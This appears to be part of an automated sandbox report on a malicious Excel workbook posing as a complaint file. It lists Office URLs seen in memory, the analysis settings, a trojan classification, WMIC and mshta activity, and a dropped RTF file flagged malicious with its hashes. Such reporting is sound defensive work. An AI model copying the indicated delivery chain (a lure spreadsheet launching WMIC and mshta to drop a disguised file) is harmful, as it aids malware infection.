                                                                                        		high
                                                                                        https://shell.suite.office.com:1443qEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		low
                                                                                        https://outlook.office365.com/api/v1.0/me/Activities01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                          		high
                                                                                          https://clients.config.office.net/user/v1.0/android/policies01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                            		high
                                                                                            https://entitlement.diagnostics.office.comEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                              		high
                                                                                              https://login.windows.net/common/oauth2/authorizeVEXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                  		high
                                                                                                  https://outlook.office.com/EXCEL.EXE, 00000000.00000003.502288674.000000000DEC5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.583692161.000000000DEC6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501376996.000000000DEC4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.308636150.000000000DEC7000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                    		high
                                                                                                    https://login.windows.net/common/oauth2/authorizeLEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://login.windows.net/common/oauth2/authorizeMKEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://storage.live.com/clientlogs/uploadlocationEXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                          		high
                                                                                                          https://augloop.office.com/v2E5EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://login.windows.net/common/oauth2/authorizeCEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://login.windows.net/common/oauth2/authorizenFdEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://substrate.office.com/search/api/v1/SearchHistoryEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                                  		high
                                                                                                                  https://login.windows.net/common/oauth2/authorizeEEXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://login.windows.net/common/oauth2/authorizeFEXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://login.windows.net/common/oauth2/authorize8EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://login.windows.net/common/oauth2/authorize_HEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://login.windows-ppe.net/common/oauth2/authorize_PEXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://globaldisco.crm.dynamics.comoEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://login.windows.net/common/oauth2/authorizeNPEXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.w3.oEXCEL.EXE, 00000000.00000003.307863159.0000000015756000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501871958.0000000015756000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.588123970.0000000015759000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388478696.000000001574E000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://substrate.office.com34EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://graph.windows.net/EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                                                		high
                                                                                                                                https://devnull.onenote.comEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bings/EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://messaging.office.com/EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                                                      		high
                                                                                                                                      http://purl.oclc.org/ooxml/drawingml/tablenEXCEL.EXE, 00000000.00000002.583373256.000000000D861000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://login.windows.net/common/oauth2/authorize/EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android;EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://skyapi.live.net/Activity/EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://substrate.office.comC6EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://api.cortana.ai01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSLEXCEL.EXE, 00000000.00000003.296469303.0000000012F74000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devices01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://staging.cortana.ai01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://onedrive.live.com/embed?01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://augloop.office.comEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://substrate.office.comt6EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown

                                                                                                                                                      Contacted IPs

                                                                                                                                                      No contacted IP infos

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                      Analysis ID:532579
                                                                                                                                                      Start date:02.12.2021
                                                                                                                                                      Start time:14:13:11
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 6m 23s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:Complaint details 143595.xlsb
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:21
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.expl.evad.winXLSB@7/5@0/0
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xlsb
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Active AutoShape Object
                                                                                                                                                      • Active Picture Object
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.88.39, 52.109.8.23
                                                                                                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532579/sample/Complaint details 143595.xlsb

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      14:15:09API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                      14:15:11API Interceptor1x Sleep call for process: mshta.exe modified

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      No context

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      No context

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\ProgramData\KBjfhfmoGRoN.rtf
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4860
                                                                                                                                                      Entropy (8bit):5.077314823774821
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:KeCWYe46RfZJNEp/491/KjxqfF29ldUQByEQmjuVoI3RfDMUL:KeCFezhZJNEp/491/KVOF25UQp9uiI3r
                                                                                                                                                      MD5:49260A7E1DE719025128C72993301DED
                                                                                                                                                      SHA1:BC80B798A2696B823D18588EB0AB6FEBF2A02F87
                                                                                                                                                      SHA-256:B625DC085D39BC8CDDA7C4277CFA755B4DAA7052701AB9DF16CAC86FC99EAEBE
                                                                                                                                                      SHA-512:60D40005155EAF790F5D20ECEE68B89D89D6512EB46E0CF03353BAE5F2EC2050F96F04161C41B2C0C23496F0212D3AB3CDF875034A31740CFAD0CE0EC7BFD0E7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
